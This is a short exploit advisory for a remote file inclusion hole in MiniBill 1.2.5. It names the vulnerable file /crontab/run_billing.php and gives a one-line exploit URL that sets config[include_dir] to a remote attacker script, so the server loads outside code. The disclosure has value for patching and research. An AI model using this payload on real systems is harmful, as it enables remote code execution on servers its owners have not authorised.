MiniBill version 1.2.5 suffers from a remote file inclusion vulnerability in run_billing.php.
474f3766765762c9a7a9ccfd2748616e12d51e852b804cbaa5d792606070e5ee
=======================================================
MiniBill 2007-04-09 (v1.2.5) Remote File include Vulnerabilities
=======================================================
Found By : Abo0od , abod@islam-attack.com
=======================================================
Homepage: http://www.hack-teach.org/cc
=======================================================
Script Site : http://www.ultrize.com/minibill/index.php?page=download
=======================================================
File: /crontab/run_billing.php <= $config['include_dir']
========================================================
Exploit:
site.com/crontab/run_billing.php?config[include_dir]=Evil-script.txt?
=======================================================
greets to : www.islam-attack.com
=======================================================